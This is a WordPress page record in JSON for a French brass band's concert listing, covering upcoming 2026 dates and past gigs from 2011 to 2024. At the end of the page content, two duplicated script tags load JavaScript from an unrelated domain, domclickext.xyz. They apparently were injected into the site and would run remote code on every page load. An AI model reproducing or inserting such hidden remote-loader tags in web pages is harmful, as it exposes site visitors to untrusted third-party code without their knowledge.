{"id":20,"date":"2013-05-01T12:45:26","date_gmt":"2013-05-01T12:45:26","guid":{"rendered":"http:\/\/jackassbrassband.fr\/?page_id=20"},"modified":"2026-01-30T07:48:59","modified_gmt":"2026-01-30T07:48:59","slug":"les-concerts","status":"publish","type":"page","link":"http:\/\/jackassbrassband.fr\/?page_id=20","title":{"rendered":"Les Concerts"},"content":{"rendered":"\n<p>Nous pr\u00e9parons notre 5i\u00e8me disque .. mais notez d\u00e9j\u00e0 nos prochains concerts &#8230;<\/p>\n\n\n<ul>\n<li><strong>Prochains concerts:<\/strong>\n<ul>\n<li>le Samedi 22 juin 2026 \u00e0 Viroflay, devant l&rsquo;Eglise St Eustache \u00e0 19h (f\u00eate de la musique)<\/li>\n<li>le samedi 4 juillet 2026 \u00e0 Verri\u00e8res L Buisson (Soir\u00e9e Swing) &#8230;<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><!--more--><!--more--><strong><em>Et avant &#8230;..<\/em><\/strong><\/p>\n<ul>\n<li><strong>Le 30 aout 2024, Grand concert <\/strong>avec le Jackass brass band en octet <strong>\u00e0 Crocq (23), \u00e0 la salle polyvalente \u00e0 20h!\u00a0<\/strong><\/li>\n<\/ul>\n<p><a href=\"http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2024\/08\/essai-affiche-Crocq-JBB-web.jpg\"><img loading=\"lazy\" class=\"alignnone size-medium wp-image-386\" src=\"http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2024\/08\/essai-affiche-Crocq-JBB-web-211x300.jpg\" alt=\"\" width=\"211\" height=\"300\" srcset=\"http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2024\/08\/essai-affiche-Crocq-JBB-web-211x300.jpg 211w, http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2024\/08\/essai-affiche-Crocq-JBB-web.jpg 372w\" sizes=\"(max-width: 211px) 100vw, 211px\" \/><\/a><a href=\"http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2024\/10\/JBB-Crocq2024-v2-1-scaled.jpg\"><img loading=\"lazy\" class=\"size-medium wp-image-394 alignright\" src=\"http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2024\/10\/JBB-Crocq2024-v2-1-300x250.jpg\" alt=\"\" width=\"300\" height=\"250\" srcset=\"http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2024\/10\/JBB-Crocq2024-v2-1-300x250.jpg 300w, http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2024\/10\/JBB-Crocq2024-v2-1-1024x854.jpg 1024w, http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2024\/10\/JBB-Crocq2024-v2-1-768x640.jpg 768w, http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2024\/10\/JBB-Crocq2024-v2-1-1536x1281.jpg 1536w, http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2024\/10\/JBB-Crocq2024-v2-1-2048x1708.jpg 2048w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Sinon, voici quelques uns des concerts que vous avez manqu\u00e9s&#8230;. (ne vous inqui\u00e9tez il y en aura plein d&rsquo;autres&#8230;<\/p>\n<ul>\n<li><strong>Le 3 mai 2024, Soir\u00e9e jazz <\/strong>avec le Jackass brass band en octet<strong> au restaurant gastronomique La ferme \u00e0 Voisins le bretonneux <\/strong>(plus d&rsquo;infos \u00e0 https:\/\/www.lafermedevoisins.fr\/)<\/li>\n<li><strong>Le 4 mai 2024,<\/strong> \u00e0 partir de 13h au centre\/village de Saint Cloud pour le festival Histoire en Seine.<strong><br \/><\/strong><\/li>\n<li><strong>Le 5 mai 2024,<\/strong> \u00e0 partir de 14h30 en parade \u00e0 Ymonville<\/li>\n<li><strong>Le Vendredi 17 mai 2024<\/strong> \u00e0 19h30, au <strong>Grand th\u00e9\u00e2tre de Tours<\/strong> pour un spectacle \u00ab\u00a0Cotton Club\u00a0\u00bb (plus d&rsquo;informations \u00e0 https:\/\/operadetours.fr\/fr\/programmation\/cotton-club)<\/li>\n<li><strong>Le Samedi 25 Mai 2024 <\/strong>au grand bal du 80e anniversaire du d\u00e9barquement et de la lib\u00e9ration au V\u00e9sinet, \u00e0 partir de 20h, (plus d&rsquo;informations \u00e0 <a href=\"_wp_link_placeholder\" data-wplink-edit=\"true\">lien Le v\u00e9sinet<\/a> )<\/li>\n<li><strong>Le Samedi 1er Juin 2024<\/strong> \u00e0 Viroflay pour un grand bal swing Lindy hop.<\/li>\n<\/ul>\n<p><strong>Le 09 septembre 2023 aux Paris Follies \u00e0 la Coupole, <\/strong>102, boulevard de Montparnasse 75014 PARIS (plus d&rsquo;infos :https:\/\/www.facebook.com\/labaronnedepaname\/?locale=fr_FR)<strong><a href=\"http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2023\/09\/COUPOLE-PARIS-FOLLIES-28-RUDOLPH-VALENTINO-NET-.jpg\"><img loading=\"lazy\" class=\"wp-image-354 aligncenter\" src=\"http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2023\/09\/COUPOLE-PARIS-FOLLIES-28-RUDOLPH-VALENTINO-NET--210x300.jpg\" alt=\"\" width=\"161\" height=\"230\" srcset=\"http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2023\/09\/COUPOLE-PARIS-FOLLIES-28-RUDOLPH-VALENTINO-NET--210x300.jpg 210w, http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2023\/09\/COUPOLE-PARIS-FOLLIES-28-RUDOLPH-VALENTINO-NET--716x1024.jpg 716w, http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2023\/09\/COUPOLE-PARIS-FOLLIES-28-RUDOLPH-VALENTINO-NET--768x1098.jpg 768w, http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2023\/09\/COUPOLE-PARIS-FOLLIES-28-RUDOLPH-VALENTINO-NET--1075x1536.jpg 1075w, http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2023\/09\/COUPOLE-PARIS-FOLLIES-28-RUDOLPH-VALENTINO-NET-.jpg 1181w\" sizes=\"(max-width: 161px) 100vw, 161px\" \/><\/a><\/strong><\/p>\n<ul>\n<li><strong>Le 07 avril 2023, Soir\u00e9e jazz <\/strong>avec le Jackass brass band en octet<strong> au restaurant gastronomique La ferme \u00e0 Voisins le bretonneux <\/strong>(plus d&rsquo;infos \u00e0 https:\/\/www.lafermedevoisins.fr\/).<strong><br \/><\/strong>\n<p>\u00a0<\/p>\n<p><strong>Le 28 janvier 2023, grande soir\u00e9e dansante\u00a0<\/strong><span class=\"x193iq5w xeuugli x13faqbe x1vvkbs x1xmvt09 x1lliihq x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1ill7wo x1x48ksl x1q74xe4 xyesn5m x1xlr1w8 xzsf02u x1yc453h\" dir=\"auto\"><span class=\"x1lliihq x6ikm8r x10wlt62 x1n2onr6 xg8j3zb\"><span class=\"\">Balboa et Swing au Studio des Rigoles (46 rue des rigoles, Paris 20ieme) avec <\/span><\/span><\/span>le Jackass brass band au grand complet !!<\/p>\n<p><strong>Le 11 novembre 2022,<\/strong> le Jackass brass band est au <strong>HEULA SWING FESTIVAL \u00e0 Caen<\/strong> (3, rue Jean-Baptiste Colbert). Plus d&rsquo;infos \u00e0 https:\/\/rockngo.fr\/les-soirees-heula\/<\/p>\n<p><strong>Le 21 juin 2022 : Le Jackass Brass Band \u00e9tait \u00e0 la f\u00eate de la musique &#8230; <\/strong><strong>En public et en direct\u00a0<\/strong>du Studio 104 de La Maison de la Radio et de la Musique, chez France Musique !!<\/p>\n<\/li>\n<li><strong>Balboa Exchange<\/strong>, Paris, 1er octobre 2021<\/li>\n<li>Le 10 novembre 2019 au\u00a0<strong>HEULA SWING FESTIVAL \u00e0 Caen<\/strong> (3, rue Jean-Baptiste Colbert). Plus d&rsquo;infos \u00e0\u00a0rockngo.fr\/heula-swing-festival\/<\/li>\n<li>\n<p style=\"font-weight: 400;\"><strong>Le 29 septembre 2019 : Swing Party #1,<\/strong> \u00e0 La Clef, St Germain en Laye, avec Le Jackass Brass \u2014\u00a0<em>mini<\/em>\u00a0\u2014 Band<\/p>\n<\/li>\n<li><strong>\u00ab\u00a0Swing Sunday\u00a0\u00bb <\/strong><span id=\"OBJ_PREFIX_DWT4040_com_zimbra_date\" class=\"Object\"><span id=\"OBJ_PREFIX_DWT4044_com_zimbra_date\" class=\"Object\"><strong>(en sextet)<\/strong><\/span><\/span>: <strong>Dimanche 20 Janvier<\/strong> 2019 sur la p\u00e9niche RIVER\u2019S KING (http:\/\/www.riversking.fr\/) amarr\u00e9e au 37 Quai Georges Gorse, 92100 Boulogne-Billancourt. M\u00e9tro Pont-de-S\u00e8vres (live @ 17h30)<\/li>\n<li>\u00e0<strong> l&rsquo;OhFun Bak festival, le samedi 25 aout 2018 <\/strong>\u00e0 Choisy au Bac: <a href=\"http:\/\/www.ohfunbak.labak.fr\">http:\/\/www.ohfunbak.labak.fr<\/a>Une Parade New Orleans, le <strong>mercredi 4 juillet 2018<\/strong> pr\u00e8s de Meaux,<\/li>\n<li><strong>\u00ab\u00a0Paris Balboa Week-End<\/strong><strong>\u00ab\u00a0<\/strong> : Dimanche 10 juin\u00a0 2018 \u00e0 Pantin\u00a0 <a href=\"https:\/\/www.parisbalboaweekend.fr\/index.php\/fr\/\">https:\/\/www.parisbalboaweekend.fr\/index.php\/fr\/<\/a><\/li>\n<li><strong>\u00ab\u00a0Swing Sunday\u00a0\u00bb<\/strong> : Dimanche 21 Janvier 2018 \u00e0 la p\u00e9niche Concorde Atlantique (live @ 17h30): ATTENTION REPORT &#8211; (en raison de la crue de la eine !!)<\/li>\n<li>\n<div><span id=\"OBJ_PREFIX_DWT143_com_zimbra_url\" class=\"Object\"><span id=\"OBJ_PREFIX_DWT144_com_zimbra_url\" class=\"Object\"><a href=\"http:\/\/www.bateauconcordeatlantique.com\/\" target=\"_blank\" rel=\"noopener\">http:\/\/www.bateauconcordeatlantique.com<\/a><\/span><\/span>\/<\/div>\n<p><a href=\"http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2013\/05\/JBB-2018-01.png\"><img loading=\"lazy\" class=\"alignnone size-medium wp-image-213\" src=\"http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2013\/05\/JBB-2018-01-215x300.png\" alt=\"JBB-2018-01\" width=\"215\" height=\"300\" srcset=\"http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2013\/05\/JBB-2018-01-215x300.png 215w, http:\/\/jackassbrassband.fr\/wp-content\/uploads\/2013\/05\/JBB-2018-01.png 625w\" sizes=\"(max-width: 215px) 100vw, 215px\" \/><\/a><\/p>\n<\/li>\n<li><strong>Du 24 au 27 Aout 2017:<\/strong>\u00a0<strong>8 concerts au festival Wine &amp; Swing in Meg\u00e8ve (http:\/\/wineandswing.fr\/)<\/strong><\/li>\n<li><strong>Vendredi 19 mai 2017: Concert <\/strong>dans le cadre de l&rsquo;Happy Jazz festival \u00e0 Saint Maur, au \u00ab\u00a0A tout va bien\u00a0\u00bb (https:\/\/www.lhappyjazz.com\/)<\/li>\n<li><strong>Samedi 10 juin 2017: Concert \/ Bal <\/strong>pour le \u00ab\u00a0Paris Balboa Exchange 2017\u00a0\u00bb<\/li>\n<li><strong>Samedi 1er juillet 2017: Concert \/ Bal Swing <\/strong>\u00e0 Gometz-Le-Chatel, Salle Barbara.<\/li>\n<li><strong>soir\u00e9e swing samedi 16 juillet \u00a02016<\/strong>&#8211; anniversaire du mus\u00e9e sp\u00e9cial \u00ab\u00a01936\u00a0\u00bb &#8211; 80 ans de la p\u00e9niche Freycinet, \u00e0\u00a0LONGUEIL-ANNEL<\/li>\n<li><strong><strong><strong>le Vendredi 27 mai\u00a02016<\/strong>\u00a0au <a href=\"https:\/\/www.google.fr\/url?sa=t&amp;rct=j&amp;q=&amp;esrc=s&amp;source=web&amp;cd=3&amp;cad=rja&amp;uact=8&amp;ved=0CC8QFjACahUKEwjDhdG-u4zIAhWG1hoKHfR3Ad0&amp;url=http%3A%2F%2Fwww.lecosymontparnasse.com%2F&amp;usg=AFQjCNGqQQ-rw_gSx1C7ybqt2cyRPpPsmw&amp;sig2=WgcLbp2XC-Fl_EIkixPAjQ&amp;bvm=bv.103388427,d.d2s\">Cosy Montparnasse<\/a> <\/strong><\/strong><\/li>\n<li><strong><strong>du 26 au 28 juin 2015 au festival Wine and Swing de Meg\u00e8ve<\/strong><\/strong><\/li>\n<li><strong><strong><strong>30 mai 2015, \u00e0 Gometz-Le-Chatel<\/strong> Bal Swing<\/strong><\/strong><\/li>\n<li><strong><strong>10 mai 2015 au Paris Flying Festival, p\u00e9niche concorde Atlantique<\/strong><\/strong><\/li>\n<li><strong><strong>\u00a027 septembre 2014, 20h30 au festival Jazz en Boucle de Saint Maur <\/strong><\/strong><\/li>\n<li><strong><strong>\u00a0le 6 juin 2014, 19h30 au Balajo \u00e0 Paris avec les Puppini&rsquo;s sisters pour leur 10 ans de carri\u00e8re !!<\/strong><\/strong><\/li>\n<li><strong>&#8211; le 5 Juillet 2014 pour le Paris Balboa Exchange 2014<\/strong><\/li>\n<li><strong>22 mars, 2013, Pan Piper, Paris, Soir\u00e9e dansante Lindy-hop<\/strong><\/li>\n<li><strong>Vendredi 7 \/ Samedi 8 septembre 2012: Parade new-orleans, Monthl\u00e9ry (Foire \u00e0 la tomate).\u00a0<\/strong><\/li>\n<li><strong>Samedi 30 Juin 2012 au Petit Journal Montparnasse \u00e0 21h30<\/strong><\/li>\n<li><strong>Samedi 3 mars 2012 \u00e0 la t\u00eate des trains, Toussons<\/strong><\/li>\n<li><strong>Samedi 3 d\u00e9cembre 2011 \u00e0 la Salle Barbara \u00e0 Gometz le Chatel,<\/strong><\/li>\n<li><strong>Dimanche 6 mars 2011 \u00e0 Auvers sur oise: Bateau prosp\u00e9rit\u00e9,\u00a0<i><\/i><i>Apr\u00e8s midi cotton club dansante de 15h \u00e0 18h\u00a0<\/i>\u00a0<\/strong><\/li>\n<\/ul>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><br \/><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Nous pr\u00e9parons notre 5i\u00e8me disque .. mais notez d\u00e9j\u00e0 nos prochains concerts &#8230; Prochains concerts: le Samedi 22 juin 2026 \u00e0 Viroflay, devant l&rsquo;Eglise St Eustache \u00e0 19h (f\u00eate de la musique) le samedi 4 juillet 2026 \u00e0 Verri\u00e8res L &hellip; <a href=\"http:\/\/jackassbrassband.fr\/?page_id=20\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":1,"comment_status":"closed","ping_status":"open","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/jackassbrassband.fr\/index.php?rest_route=\/wp\/v2\/pages\/20"}],"collection":[{"href":"http:\/\/jackassbrassband.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/jackassbrassband.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/jackassbrassband.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/jackassbrassband.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20"}],"version-history":[{"count":69,"href":"http:\/\/jackassbrassband.fr\/index.php?rest_route=\/wp\/v2\/pages\/20\/revisions"}],"predecessor-version":[{"id":412,"href":"http:\/\/jackassbrassband.fr\/index.php?rest_route=\/wp\/v2\/pages\/20\/revisions\/412"}],"wp:attachment":[{"href":"http:\/\/jackassbrassband.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}